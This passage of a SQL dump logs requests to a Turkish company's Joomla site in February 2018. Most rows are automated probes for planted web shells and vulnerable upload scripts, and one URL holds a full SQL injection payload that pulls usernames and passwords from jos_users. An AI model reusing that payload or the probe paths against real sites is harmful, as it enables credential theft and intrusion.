00:00:00',301),(18129,'http://3s-technologies.com.tr/tr/star/administrator/templates/hathor/html/com_messages/messages/pouimeq.php',NULL,'http://site.ru','',1,0,'2018-02-01 11:49:54','0000-00-00 00:00:00',301),(18130,'http://3s-technologies.com.tr/tr/administrator/components/com_categories/views/category/tund.php',NULL,'http://site.ru','',1,0,'2018-02-01 12:53:12','0000-00-00 00:00:00',301),(18131,'http://3s-technologies.com.tr/tr/templates/default/language/sql-on.php',NULL,'http://site.ru','',1,0,'2018-02-01 12:53:22','0000-00-00 00:00:00',301),(18132,'http://3s-technologies.com.tr/tr/templates/beez5/-.php',NULL,'http://site.ru','',2,0,'2018-02-01 12:53:56','0000-00-00 00:00:00',301),(18133,'http://3s-technologies.com.tr/tr/administrator/components/com_plugins/mlkeha.php',NULL,'http://site.ru','',2,0,'2018-02-01 12:55:12','0000-00-00 00:00:00',301),(18134,'http://3s-technologies.com.tr/tr/editor/zlrzvnb.php',NULL,'http://site.ru','',1,0,'2018-02-01 13:06:22','0000-00-00 00:00:00',301),(18135,'http://3s-technologies.com.tr/tr/layouts/dxhox.php',NULL,'http://site.ru','',1,0,'2018-02-01 13:51:50','0000-00-00 00:00:00',301),(18136,'http://3s-technologies.com.tr/tr/templates/blue-lotus/html/com_search/htaccess.php',NULL,'http://site.ru','',1,0,'2018-02-01 14:02:56','0000-00-00 00:00:00',301),(18137,'http://3s-technologies.com.tr/tr/imag/rxosrl.php',NULL,'http://site.ru','',1,0,'2018-02-01 14:16:51','0000-00-00 00:00:00',301),(18138,'http://3s-technologies.com.tr/tr/tmp/ckdbf.php',NULL,'http://site.ru','',1,0,'2018-02-01 14:50:07','0000-00-00 00:00:00',301),(18139,'http://3s-technologies.com.tr/tr/modules/mod_tzk2_new/tmpl/boxtwo/sky.php',NULL,'http://site.ru','',2,0,'2018-02-01 14:50:27','0000-00-00 00:00:00',301),(18140,'http://3s-technologies.com.tr/tr/administrator/includes/kptun.php',NULL,'http://site.ru','',1,0,'2018-02-01 14:50:37','0000-00-00 00:00:00',301),(18141,'http://3s-technologies.com.tr/tr/modules/mod_breadcrumbs/lomnw.php',NULL,'http://site.ru','',1,0,'2018-02-01 14:50:42','0000-00-00 00:00:00',301),(18142,'http://3s-technologies.com.tr/tr/wp-content/plugins/nav-menus.php',NULL,'http://site.ru','',1,0,'2018-02-01 14:50:49','0000-00-00 00:00:00',301),(18143,'http://3s-technologies.com.tr/tr/nova',NULL,'http://site.ru','',1,0,'2018-02-01 14:51:09','0000-00-00 00:00:00',301),(18144,'http://3s-technologies.com.tr/tr/plugins/editors/jce/tiny_mce/plugins/advcode/img/debug.php',NULL,'http://site.ru','',4,0,'2018-02-01 15:46:13','0000-00-00 00:00:00',301),(18145,'http://3s-technologies.com.tr/tr/administrator/components/com_content/wqcuc.php',NULL,'http://site.ru','',1,0,'2018-02-01 15:46:28','0000-00-00 00:00:00',301),(18146,'http://3s-technologies.com.tr/tr/administrator/components/com_content/wqcuc.php',NULL,'http://site.ru','',1,0,'2018-02-01 15:46:28','0000-00-00 00:00:00',301),(18147,'http://3s-technologies.com.tr/tr/images/stories/img.png.php',NULL,'http://site.ru','',2,0,'2018-02-01 15:46:40','0000-00-00 00:00:00',301),(18148,'http://3s-technologies.com.tr/tr/administrator/components/com_messages/views/lomnw.php',NULL,'http://site.ru','',2,0,'2018-02-01 15:47:05','0000-00-00 00:00:00',301),(18149,'http://3s-technologies.com.tr/tr/subzero/account-validation/file/file.php',NULL,'http://site.ru','',1,0,'2018-02-01 15:47:41','0000-00-00 00:00:00',301),(18150,'http://3s-technologies.com.tr/tr/administrator/components/com_ckforms/views/ckform/tmpl/sky.php',NULL,'http://site.ru','',1,0,'2018-02-01 15:57:03','0000-00-00 00:00:00',301),(18151,'http://3s-technologies.com.tr/tr/forum/logo_img.php',NULL,'http://site.ru','',2,0,'2018-02-01 15:57:25','0000-00-00 00:00:00',301),(18152,'http://3s-technologies.com.tr/tr/tmp/install_4ffcb135841c9/sv-se/jhwtxu.php',NULL,'http://site.ru','',2,0,'2018-02-01 16:00:34','0000-00-00 00:00:00',301),(18153,'http://3s-technologies.com.tr/tr/administrator/templates/hathor/html/com_plugins/plugins/plmrmb.php',NULL,'http://site.ru','',2,0,'2018-02-01 16:41:28','0000-00-00 00:00:00',301),(18154,'http://3s-technologies.com.tr/tr/components/com_media/string.php',NULL,'http://site.ru','',1,0,'2018-02-01 16:41:38','0000-00-00 00:00:00',301),(18155,'http://3s-technologies.com.tr/tr/plss.php',NULL,'http://site.ru','',3,0,'2018-02-01 16:43:11','0000-00-00 00:00:00',301),(18156,'http://3s-technologies.com.tr/tr/templates/go_roundy/css/omquas.php',NULL,'http://site.ru','',1,0,'2018-02-01 16:45:46','0000-00-00 00:00:00',301),(18157,'http://3s-technologies.com.tr/tr/administrator/components/com_extplorer/scripts/extjs3/resources/images/default/progress/404.php',NULL,'http://site.ru','',1,0,'2018-02-01 16:51:46','0000-00-00 00:00:00',301),(18158,'http://3s-technologies.com.tr/tr/administrator/components/com_djimageslider/views/item/tmpl/htaccess.php',NULL,'http://site.ru','',2,0,'2018-02-01 17:36:00','0000-00-00 00:00:00',301),(18159,'http://3s-technologies.com.tr/tr/components/com_virtuemart/themes/default/templates/browse/sql-ou.php',NULL,'http://site.ru','',2,0,'2018-02-01 18:30:37','0000-00-00 00:00:00',301),(18160,'http://3s-technologies.com.tr/tr/plugins/editors/jckeditor/jckeditor/plugins/jfilebrowser/images/icons/desua.php',NULL,'http://site.ru','',1,0,'2018-02-01 18:30:58','0000-00-00 00:00:00',301),(18161,'http://3s-technologies.com.tr/tr/layouts/hdovr.php',NULL,'http://site.ru','',2,0,'2018-02-01 18:31:22','0000-00-00 00:00:00',301),(18162,'http://3s-technologies.com.tr/tr/components/com_content/ead2sz.php',NULL,'http://site.ru','',1,0,'2018-02-01 18:31:34','0000-00-00 00:00:00',301),(18163,'http://3s-technologies.com.tr/tr/components/com_banners/models/dwsonv.php',NULL,'http://site.ru','',2,0,'2018-02-01 18:40:54','0000-00-00 00:00:00',301),(18164,'http://3s-technologies.com.tr/tr/administrator/components/com_banners/views/tracks/deqade.php',NULL,'http://site.ru','',2,0,'2018-02-01 18:41:26','0000-00-00 00:00:00',301),(18165,'http://3s-technologies.com.tr/tr/libraries/pattemplate/sffsr.php',NULL,'http://site.ru','',2,0,'2018-02-01 19:25:01','0000-00-00 00:00:00',301),(18166,'http://3s-technologies.com.tr/tr/tounsicoke.php',NULL,'http://site.ru','',1,0,'2018-02-01 19:25:26','0000-00-00 00:00:00',301),(18167,'http://3s-technologies.com.tr/tr/libraries/cms/menu/ehysha.php',NULL,'http://site.ru','',3,0,'2018-02-01 19:25:49','0000-00-00 00:00:00',301),(18168,'http://3s-technologies.com.tr/tr/language/overrides/wp-logins.php',NULL,'http://site.ru','',2,0,'2018-02-01 19:25:55','0000-00-00 00:00:00',301),(18169,'http://3s-technologies.com.tr/tr/components/com_content/views/section/tmpl/desua.php',NULL,'http://site.ru','',1,0,'2018-02-01 19:26:02','0000-00-00 00:00:00',301),(18170,'http://3s-technologies.com.tr/tr/modules/mod_simplefileuploadv1.4/omb.php',NULL,'http://site.ru','',1,0,'2018-02-01 19:26:03','0000-00-00 00:00:00',301),(18171,'http://3s-technologies.com.tr/tr/media/com_finder/js/wrkim.php',NULL,'http://site.ru','',2,0,'2018-02-01 20:18:48','0000-00-00 00:00:00',301),(18172,'http://3s-technologies.com.tr/tr/administrator/components/com_content/models/forms/wjeirsw.php',NULL,'http://site.ru','',1,0,'2018-02-01 20:20:17','0000-00-00 00:00:00',301),(18173,'http://3s-technologies.com.tr/tr/plugins/authentication/twatg.php',NULL,'http://site.ru','',2,0,'2018-02-01 20:20:33','0000-00-00 00:00:00',301),(18174,'http://3s-technologies.com.tr/tr/templates/yoo_bigeasy/styles/blue/images/tools/plmrmb.php',NULL,'http://site.ru','',2,0,'2018-02-01 20:21:37','0000-00-00 00:00:00',301),(18175,'http://3s-technologies.com.tr/tr/administrator/templates/hathor/language/en-gb/j_ajax.php',NULL,'http://site.ru','',1,0,'2018-02-01 20:29:17','0000-00-00 00:00:00',301),(18176,'http://3s-technologies.com.tr/tr/language/en-gb/bahvimq.php',NULL,'http://site.ru','',1,0,'2018-02-01 20:30:04','0000-00-00 00:00:00',301),(18177,'http://3s-technologies.com.tr/tr/components/com_phocagallery/views/info/tmpl/desua.php',NULL,'http://site.ru','',1,0,'2018-02-01 21:12:47','0000-00-00 00:00:00',301),(18178,'http://3s-technologies.com.tr/tr/templates/yoo_bigeasy/warp/systems/joomla.1.7/menus/mhhrx.php',NULL,'http://site.ru','',1,0,'2018-02-01 21:13:40','0000-00-00 00:00:00',301),(18179,'http://3s-technologies.com.tr/tr/administrator/components/com_messages/views/messages/tmpl/yrtfs.php',NULL,'http://site.ru','',1,0,'2018-02-01 21:13:55','0000-00-00 00:00:00',301),(18180,'http://3s-technologies.com.tr/tr/libraries/system_info.php',NULL,'http://site.ru','',2,0,'2018-02-01 21:14:00','0000-00-00 00:00:00',301),(18181,'http://3s-technologies.com.tr/tr/xmlrpc/dlrejt.php',NULL,'http://site.ru','',1,0,'2018-02-01 21:14:04','0000-00-00 00:00:00',301),(18182,'http://3s-technologies.com.tr/tr/administrator/components/com_users/views/mail/mbfg.php',NULL,'http://site.ru','',1,0,'2018-02-01 21:14:07','0000-00-00 00:00:00',301),(18183,'http://3s-technologies.com.tr/tr/images/stories/index_backup.php',NULL,'http://site.ru','',1,0,'2018-02-01 21:14:08','0000-00-00 00:00:00',301),(18184,'http://3s-technologies.com.tr/tr/images/404.php',NULL,'http://site.ru','',38,0,'2018-02-01 21:14:16','0000-00-00 00:00:00',301),(18185,'http://3s-technologies.com.tr/tr/templates/default/img/carousel/lomnw.php',NULL,'http://site.ru','',2,0,'2018-02-01 21:14:23','0000-00-00 00:00:00',301),(18186,'http://3s-technologies.com.tr/tr/xcontact182.php',NULL,'http://site.ru','',1,0,'2018-02-01 21:16:29','0000-00-00 00:00:00',301),(18187,'http://3s-technologies.com.tr/tr/plugins/editors/jckeditor/skins/office2007/images/dwsonv.php',NULL,'http://site.ru','',2,0,'2018-02-01 21:16:48','0000-00-00 00:00:00',301),(18188,'http://3s-technologies.com.tr/tr/components/qedjmy.php',NULL,'http://site.ru','',1,0,'2018-02-01 21:21:42','0000-00-00 00:00:00',301),(18189,'http://3s-technologies.com.tr/tr/administrator/components/com_installer/controllers/dwsonv.php',NULL,'http://site.ru','',1,0,'2018-02-01 22:08:06','0000-00-00 00:00:00',301),(18190,'http://3s-technologies.com.tr/tr/includes/logo_img.php',NULL,'http://site.ru','',3,0,'2018-02-01 22:08:13','0000-00-00 00:00:00',301),(18191,'http://3s-technologies.com.tr/tr/administrator/components/com_newsfeeds/views/mjfds.php',NULL,'http://site.ru','',2,0,'2018-02-01 22:08:15','0000-00-00 00:00:00',301),(18192,'http://3s-technologies.com.tr/tr/tmp/install_59c2b23c0a14e/packages/install_59c2b23ea3efc/administrator/dieace.php',NULL,'http://site.ru','',1,0,'2018-02-01 22:08:57','0000-00-00 00:00:00',301),(18193,'http://3s-technologies.com.tr/tr/templates/beez5/fso.php',NULL,'http://site.ru','',1,0,'2018-02-01 22:18:04','0000-00-00 00:00:00',301),(18194,'http://3s-technologies.com.tr/tr/tmp/com_virtuemart_allinone_update/admin/plugins/vmpayment/heidelpay/dwsonv.php',NULL,'http://site.ru','',2,0,'2018-02-01 23:00:52','0000-00-00 00:00:00',301),(18195,'http://3s-technologies.com.tr/tr/plugins/editors/jckeditor/jckeditor/plugins/templates/dialogs/pube.php',NULL,'http://site.ru','',2,0,'2018-02-01 23:02:18','0000-00-00 00:00:00',301),(18196,'http://3s-technologies.com.tr/tr/administrator/components/com_virtuemart/classes/payment/debug.php',NULL,'http://site.ru','',1,0,'2018-02-01 23:02:21','0000-00-00 00:00:00',301),(18197,'http://3s-technologies.com.tr/tr/cli/lastupdate.php',NULL,'http://site.ru','',1,0,'2018-02-01 23:02:28','0000-00-00 00:00:00',301),(18198,'http://3s-technologies.com.tr/tr/images/ylkdjl.php',NULL,'http://site.ru','',1,0,'2018-02-01 23:02:48','0000-00-00 00:00:00',301),(18199,'http://3s-technologies.com.tr/tr/plugins/editors-xtd/ws_shortcodebutton/helper/images/plmrmb.php',NULL,'http://site.ru','',2,0,'2018-02-01 23:55:19','0000-00-00 00:00:00',301),(18200,'http://3s-technologies.com.tr/tr/joomla/components/com_search/views/search/desua.php',NULL,'http://site.ru','',2,0,'2018-02-01 23:56:22','0000-00-00 00:00:00',301),(18201,'http://3s-technologies.com.tr/tr/plugins/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/default/sky.php',NULL,'http://site.ru','',2,0,'2018-02-01 23:56:35','0000-00-00 00:00:00',301),(18202,'http://3s-technologies.com.tr/tr/media/editors/tinymce/plugins/example_dependency/debug.php',NULL,'http://site.ru','',2,0,'2018-02-01 23:57:35','0000-00-00 00:00:00',301),(18203,'http://3s-technologies.com.tr/tr/templates/plantillabaratey3/html/com_content/featured/connet.php',NULL,'http://site.ru','',1,0,'2018-02-01 23:58:58','0000-00-00 00:00:00',301),(18204,'http://3s-technologies.com.tr/tr/templates/beez3/html/com_contact/contact/update.php',NULL,'http://site.ru','',1,0,'2018-02-02 00:03:54','0000-00-00 00:00:00',301),(18205,'http://www.3s-technologies.com.tr/tr/urunler/2-el-makineler/results,1-50',NULL,'','',3,0,'2018-02-02 00:16:13','0000-00-00 00:00:00',301),(18206,'http://3s-technologies.com.tr/tr/plugins/installer/ddcwika.php',NULL,'http://site.ru','',1,0,'2018-02-02 00:48:49','0000-00-00 00:00:00',301),(18207,'http://3s-technologies.com.tr/tr/plugins/installer/ddcwika.php',NULL,'http://site.ru','',1,0,'2018-02-02 00:48:49','0000-00-00 00:00:00',301),(18208,'http://3s-technologies.com.tr/tr/includes/classp6.php',NULL,'http://site.ru','',2,0,'2018-02-02 00:48:49','0000-00-00 00:00:00',301),(18209,'http://3s-technologies.com.tr/tr/administrator/components/com_finder/sql/debug.php',NULL,'http://site.ru','',1,0,'2018-02-02 00:48:50','0000-00-00 00:00:00',301),(18210,'http://3s-technologies.com.tr/tr/microsoft1/account-validation/file/file.php',NULL,'http://site.ru','',2,0,'2018-02-02 00:50:10','0000-00-00 00:00:00',301),(18211,'http://3s-technologies.com.tr/tr/administrator/components/com_akeeba/liveupdate/language/ru-ru/uhasua.php',NULL,'http://site.ru','',1,0,'2018-02-02 01:02:58','0000-00-00 00:00:00',301),(18212,'http://3s-technologies.com.tr/tr/plugins/editors/tinymce/jscripts/tiny_mce/themes/tbisw.php',NULL,'http://site.ru','',1,0,'2018-02-02 01:41:45','0000-00-00 00:00:00',301),(18213,'http://3s-technologies.com.tr/tr/administrator/modules/mod_custom/tmpl/mntref.php',NULL,'http://site.ru','',2,0,'2018-02-02 01:42:16','0000-00-00 00:00:00',301),(18214,'http://3s-technologies.com.tr/tr/tmp/com_virtuemart_update/components/com_virtuemart/views/cart/dceal.php',NULL,'http://site.ru','',2,0,'2018-02-02 01:42:38','0000-00-00 00:00:00',301),(18215,'http://3s-technologies.com.tr/tr/plugins/vmcalculation/avalara/classes/wsdl/bcdaz.php',NULL,'http://site.ru','',3,0,'2018-02-02 01:42:46','0000-00-00 00:00:00',301),(18216,'http://3s-technologies.com.tr/tr/404.php',NULL,'http://site.ru','',554,0,'2018-02-02 01:42:58','0000-00-00 00:00:00',301),(18217,'http://3s-technologies.com.tr/tr/administrator/templates/hathor/html/com_redirect/links/debug.php',NULL,'http://site.ru','',1,0,'2018-02-02 01:43:00','0000-00-00 00:00:00',301),(18218,'http://3s-technologies.com.tr/tr/plugins/content/sigplus/engines/slimbox2/js/sql-ou.php',NULL,'http://site.ru','',1,0,'2018-02-02 02:35:00','0000-00-00 00:00:00',301),(18219,'http://3s-technologies.com.tr/tr/administrator/components/com_uniform/language/admin/de-de/sky.php',NULL,'http://site.ru','',2,0,'2018-02-02 02:35:40','0000-00-00 00:00:00',301),(18220,'http://3s-technologies.com.tr/tr/wp-press.php',NULL,'http://site.ru','',9,0,'2018-02-02 02:36:21','0000-00-00 00:00:00',301),(18221,'http://3s-technologies.com.tr/tr/components/com_users/helpers/html/mhhrx.php',NULL,'http://site.ru','',1,0,'2018-02-02 02:45:21','0000-00-00 00:00:00',301),(18222,'http://3s-technologies.com.tr/tr/administrator/templates/hathor/html/com_users/groups/pouimeq.php',NULL,'http://site.ru','',1,0,'2018-02-02 02:45:34','0000-00-00 00:00:00',301),(18223,'http://3s-technologies.com.tr/tr/cli/logo_img.php',NULL,'http://site.ru','',3,0,'2018-02-02 02:45:54','0000-00-00 00:00:00',301),(18224,'http://3s-technologies.com.tr/tr/administrator/templates/hathor/html/com_redirect/dnewv.php',NULL,'http://site.ru','',2,0,'2018-02-02 02:46:59','0000-00-00 00:00:00',301),(18225,'http://3s-technologies.com.tr/tr/libraries/cms/html/slbut.php',NULL,'http://site.ru','',1,0,'2018-02-02 02:58:29','0000-00-00 00:00:00',301),(18226,'http://3s-technologies.com.tr/tr/includes/account-validation/file/file.php',NULL,'http://site.ru','',1,0,'2018-02-02 03:29:13','0000-00-00 00:00:00',301),(18227,'http://3s-technologies.com.tr/tr/iq4age.php',NULL,'http://site.ru','',2,0,'2018-02-02 03:29:15','0000-00-00 00:00:00',301),(18228,'http://3s-technologies.com.tr/tr/dwsonv.php',NULL,'http://site.ru','',4,0,'2018-02-02 03:29:19','0000-00-00 00:00:00',301),(18229,'http://3s-technologies.com.tr/tr/images/stories/..wil!.php',NULL,'http://site.ru','',2,0,'2018-02-02 03:29:20','0000-00-00 00:00:00',301),(18230,'http://3s-technologies.com.tr/tr/plugins/xmlrpc/avvli.php',NULL,'http://site.ru','',1,0,'2018-02-02 04:21:41','0000-00-00 00:00:00',301),(18231,'http://3s-technologies.com.tr/tr/joomla/modules/mod_poll/tmpl/debug.php',NULL,'http://site.ru','',1,0,'2018-02-02 04:22:00','0000-00-00 00:00:00',301),(18232,'http://3s-technologies.com.tr/tr/libraries/mo.php',NULL,'http://site.ru','',1,0,'2018-02-02 05:15:27','0000-00-00 00:00:00',301),(18233,'http://3s-technologies.com.tr/tr/libraries/joomla/application/wso789.php',NULL,'http://site.ru','',1,0,'2018-02-02 06:40:15','0000-00-00 00:00:00',301),(18234,'http://3s-technologies.com.tr/tr/log/logs/error.php',NULL,'http://site.ru','',1,0,'2018-02-02 06:41:40','0000-00-00 00:00:00',301),(18235,'http://3s-technologies.com.tr/tr/administrator/components/com_contact/helpers/html/lomnw.php',NULL,'http://site.ru','',2,0,'2018-02-02 06:42:37','0000-00-00 00:00:00',301),(18236,'http://3s-technologies.com.tr/tr/components/com_jce/editor/tiny_mce/plugins/paste/js/ojkgh.php',NULL,'http://site.ru','',1,0,'2018-02-02 07:14:00','0000-00-00 00:00:00',301),(18237,'https://3s-technologies.com.tr/nova-elektronik.com.tr/joomla/index.php?option=com_user&task=register&lang=en',NULL,'https://3s-technologies.com.tr/nova-elektronik.com.tr/joomla/index.php?option=com_user&task=register&lang=en','',12,0,'2018-02-02 15:41:15','0000-00-00 00:00:00',301),(18238,'http://3s-technologies.com.tr/tr/?option=com_tag&controller=tag&task=add&article_id=-260479/**//*!union*//**//*!select*//**/concat(username,0x3a,password,0x3a,usertype)/**//*!from*//**/jos_users/**/&tmpl=component',NULL,'','',1,0,'2018-02-02 16:47:33','0000-00-00 00:00:00',301),(18239,'http://www.3s-technologies.com.tr/tr/components/com_jimtawl/jimtawl.php',NULL,'','',1,0,'2018-02-02 21:24:44','0000-00-00 00:00:00',301),(18240,'http://www.3s-technologies.com.tr/en/wp-content/themes/atom/style.css',NULL,'http://www.3s-technologies.com.tr/wp-content/themes/atom/style.css','',2,0,'2018-02-03 09:34:59','0000-00-00 00:00:00',301),(18241,'http://3s-technologies.com.tr/tr/templates/beez/html/com_poll/poll/conflg.php',NULL,'http://site.ru','',1,0,'2018-02-03 11:28:41','0000-00-00 00:00:00',301),(18242,'http://3s-technologies.com.tr/tr/components/com_wrapper/views/wrapper/tmpl/thumbs.php',NULL,'http://site.ru','',1,0,'2018-02-03 11:37:52','0000-00-00 00:00:00',301),(18243,'http://3s-technologies.com.tr/tr/components/com_mailto/views/sent/tmpl/thumbs.php',NULL,'http://site.ru','',1,0,'2018-02-03 11:38:05','0000-00-00 00:00:00',301),(18244,'http://3s-technologies.com.tr/tr/plugins/editors/tinymce/jscripts/tiny_mce/plugins/style/thumbs.php',NULL,'http://site.ru','',1,0,'2018-02-03 11:38:24','0000-00-00 00:00:00',301),(18245,'http://3s-technologies.com.tr/tr/images/log.php',NULL,'http://site.ru','',4,0,'2018-02-03 13:09:40','0000-00-00 00:00:00',301),(18246,'http://3s-technologies.com.tr/tr/administrator/templates/khepri/images/toolbar/thumbs.php',NULL,'http://site.ru','',2,0,'2018-02-03 13:16:24','0000-00-00 00:00:00',301),(18247,'http://3s-technologies.com.tr/tr/plugins/editors/tinymce/jscripts/tiny_mce/plugins/directionality/thumbs.php',NULL,'http://site.ru','',2,0,'2018-02-03 14:07:45','0000-00-00 00:00:00',301),(18248,'http://3s-technologies.com.tr/tr/mod_ariimageslidersa.php',NULL,'http://site.ru','',2,0,'2018-02-03 14:07:49','0000-00-00 00:00:00',301),(18249,'http://3s-technologies.com.tr/tr/templates/beez/html/com_content/section/thumbs.php',NULL,'http://site.ru','',2,0,'2018-02-03 15:07:02','0000-00-00 00:00:00',301),(18250,'http://3s-technologies.com.tr/tr/administrator/components/com_banners/views/download/config.php',NULL,'http://site.ru','',3,0,'2018-02-03 15:08:41','0000-00-00 00:00:00',301),(18251,'http://3s-technologies.com.tr/tr/tmp/index.php',NULL,'http://site.ru','',1,0,'2018-02-03 16:19:12','0000-00-00 00:00:00',301),(18252,'http://3s-technologies.com.tr/tr/administrator/components/com_modules/views/module/config.php',NULL,'http://site.ru','',1,0,'2018-02-03 17:10:00','0000-00-00 00:00:00',301),(18253,'http://3s-technologies.com.tr/tr/administrator/components/com_modules/views/module/config.php',NULL,'http://site.ru','',1,0,'2018-02-03 17:10:00','0000-00-00 00:00:00',301),(18254,'http://3s-technologies.com.tr/tr/plugins/editors/tinymce/jscripts/tiny_mce/plugins/contextmenu/thumbs.php',NULL,'http://site.ru','',2,0,'2018-02-03 17:10:27','0000-00-00 00:00:00',301),(18255,'http://3s-technologies.com.tr/tr/templates/atomic/kd.php',NULL,'http://site.ru','',1,0,'2018-02-03 17:19:58','0000-00-00 00:00:00',301),(18256,'http://3s-technologies.com.tr/tr/templates/beez/html/com_user/reset/conflg.php',NULL,'http://site.ru','',1,0,'2018-02-03 19:12:43','0000-00-00 00:00:00',301),(18257,'http://3s-technologies.com.tr/tr/plugins/editors/tinymce/jscripts/tiny_mce/themes/advanced/thumbs.php',NULL,'http://site.ru','',2,0,'2018-02-03 20:11:57','0000-00-00 00:00:00',301),(18258,'http://3s-technologies.com.tr/tr/templates/ja_purity/styles/elements/red/thumbs.php',NULL,'http://site.ru','',1,0,'2018-02-03 20:18:44','0000-00-00 00:00:00',301),(18259,'http://3s-technologies.com.tr/tr/modules/htaccess.php',NULL,'http://site.ru','',1,0,'2018-02-03 20:20:10','0000-00-00 00:00:00',301),(18260,'http://3s-technologies.com.tr/tr/install/models.php',NULL,'http://site.ru','',2,0,'2018-02-03 21:08:11','0000-00-00 00:00:00',301),(18261,'http://3s-technologies.com.tr/tr/administrator/components/com_installer/views/install/thumbs.php',NULL,'http://site.ru','',1,0,'2018-02-03 21:17:47','0000-00-00 00:00:00',301),(18262,'http://3s-technologies.com.tr/tr/components/com_contact/views/categories/tmpl/tmpl.php',NULL,'http://site.ru','',1,0,'2018-02-03 22:19:19','0000-00-00 00:00:00',301),(18263,'http://3s-technologies.com.tr/tr/components/com_user/views/register/tmpl/conflg.php',NULL,'http://site.ru','',1,0,'2018-02-03 22:33:29','0000-00-00 00:00:00',301),(18264,'http://3s-technologies.com.tr/tr/plugins/editors/tinymce/jscripts/tiny_mce/plugins/flash/thumbs.php',NULL,'http://site.ru','',2,0,'2018-02-03 23:05:47','0000-00-00 00:00:00',301),(18265,'http://3s-technologies.com.tr/tr/plugins/content/ini.php',NULL,'http://site.ru','',1,0,'2018-02-03 23:08:50','0000-00-00 00:00:00',301),(18266,'http://3s-technologies.com.tr/tr/libraries/joomla/document/html/renderer/thumbs.php',NULL,'http://site.ru','',1,0,'2018-02-03 23:14:05','0000-00-00 00:00:00',301),(18267,'http://3s-technologies.com.tr/tr/administrator/components/com_menus/assets/images/thumbs.php',NULL,'http://site.ru','',1,0,'2018-02-04 00:03:44','0000-00-00 00:00:00',301),(18268,'http://3s-technologies.com.tr/tr/language/system.php',NULL,'http://site.ru','',1,0,'2018-02-04 00:04:19','0000-00-00 00:00:00',301),(18269,'http://3s-technologies.com.tr/tr/plugins/user/user.php',NULL,'http://site.ru','',4,0,'2018-02-04 00:04:29','0000-00-00 00:00:00',301),(18270,'http://3s-technologies.com.tr/tr/components/com_search/models/models.php',NULL,'http://site.ru','',2,0,'2018-02-04 00:04:35','0000-00-00 00:00:00',301),(18271,'http://3s-technologies.com.tr/tr/components/com_poll/views/poll/tmpl/thumbs.php',NULL,'http://site.ru','',1,0,'2018-02-04 01:13:05','0000-00-00 00:00:00',301),(18272,'http://3s-technologies.com.tr/tr/libraries/joomla/filesystem/meta/language/config.php',NULL,'http://site.ru','',1,0,'2018-02-04 02:01:42','0000-00-00 00:00:00',301),(18273,'http://3s-technologies.com.tr/tr/templates/beez/html/com_content/article/thumbs.php',NULL,'http://site.ru','',1,0,'2018-02-04 02:07:13','0000-00-00 00:00:00',301),(18274,'http://3s-technologies.com.tr/tr/cache/ini.php',NULL,'http://site.ru','',1,0,'2018-02-04 05:00:54','0000-00-00 00:00:00',301),(18275,'http://3s-technologies.com.tr/tr/templates/beez/html/com_content/article/conflg.php',NULL,'http://site.ru','',2,0,'2018-02-04 06:55:11','0000-00-00 00:00:00',301),(18276,'http://3s-technologies.com.tr/tr/admin.php',NULL,'http://site.ru','',909,0,'2018-02-04 08:57:39','0000-00-00 00:00:00',301),(18277,'http://3s-technologies.com.tr/tr/cli/w.php',NULL,'http://site.ru','',1,0,'2018-02-04 10:58:48','0000-00-00 00:00:00',301),(18278,'http://3s-technologies.com.tr/tr/plugins/editors/tinymce/jscripts/tiny_mce/plugins/preview/thumbs.php',NULL,'http://site.ru','',1,0,'2018-02-04 11:00:19','0000-00-00 00:00:00',301),(18279,'http://3s-technologies.com.tr/tr/plugins/editors/tinymce/jscripts/tiny_mce/plugins/advimage/thumbs.php',NULL,'http://site.ru','',1,0,'2018-02-04 11:02:22','0000-00-00 00:00:00',301),(18280,'http://3s-technologies.com.tr/tr/administrator/components/com_installer/views/components/conflg.php',NULL,'http://site.ru','',1,0,'2018-02-04 15:47:09','0000-00-00 00:00:00',301),(18281,'http://3s-technologies.com.tr/tr/layouts/logo_img.php',NULL,'http://site.ru','',1,0,'2018-02-04 16:27:45','0000-00-00 00:00:00',301),(18282,'http://www.3s-technologies.com.tr/en//wp-includes/wlwmanifest.xml',NULL,'','',48,0,'2018-02-05 02:36:01','0000-00-00 00:00:00',301),(18283,'http://www.3s-technologies.com.tr/en//xmlrpc.php?rsd',NULL,'','',46,0,'2018-02-05 02:36:01','0000-00-00 00:00:00',301),(18284,'http://www.3s-technologies.com.tr/en//blog/wp-includes/wlwmanifest.xml',NULL,'','',46,0,'2018-02-05 02:36:02','0000-00-00 00:00:00',301),(18285,'http://www.3s-technologies.com.tr/en//wordpress/wp-includes/wlwmanifest.xml',NULL,'','',46,0,'2018-02-05 02:36:02','0000-00-00 00:00:00',301),(18286,'http://www.3s-technologies.com.tr/en//wp/wp-includes/wlwmanifest.xml',NULL,'','',46,0,'2018-02-05 02:36:02','0000-00-00 00:00:00',301),(18287,'http://www.3s-technologies.com.tr/en//site/wp-includes/wlwmanifest.xml',NULL,'','',46,0,'2018-02-05 02:36:02','0000-00-00 00:00:00',301),(18288,'http://www.3s-technologies.com.tr/en//cms/wp-includes/wlwmanifest.xml',NULL,'','',45,0,'2018-02-05 02:36:03','0000-00-00 00:00:00',301),(18289,'http://3s-technologies.com.tr/tr/components/com_adsmanager/js/noconflict.js',NULL,'','',1,0,'2018-02-05 05:46:14','0000-00-00 00:00:00',301),(18290,'http://3s-technologies.com.tr/tr/administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php',NULL,'http://3s-technologies.com.tr/tr/administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php','',18,0,'2018-02-05 06:07:06','0000-00-00 00:00:00',301),(18291,'http://3s-technologies.com.tr/en/administrator/components/com_civicrm/civicrm/packages/openflashchart/php-ofc-library/ofc_upload_image.php',NULL,'http://3s-technologies.com.tr/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php','',10,0,'2018-02-05 06:37:11','0000-00-00 00:00:00',301),(18292,'http://3s-technologies.com.tr/en/administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php',NULL,'http://3s-technologies.com.tr/administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php','',9,0,'2018-02-05 09:01:53','0000-00-00 00:00:00',301),(18293,'http://3s-technologies.com.tr/wp-content/themes/kubiccoin/config.php',NULL,'3s-technologies.com.tr','',1,0,'2018-02-05 10:22:33','0000-00-00 00:00:00',301),(18294,'http://3s-technologies.com.tr/wp-content/plugins/wp-db-ajax-made/wp-db-backup.php',NULL,'3s-technologies.com.tr','',1,0,'2018-02-05 10:23:02','0000-00-00 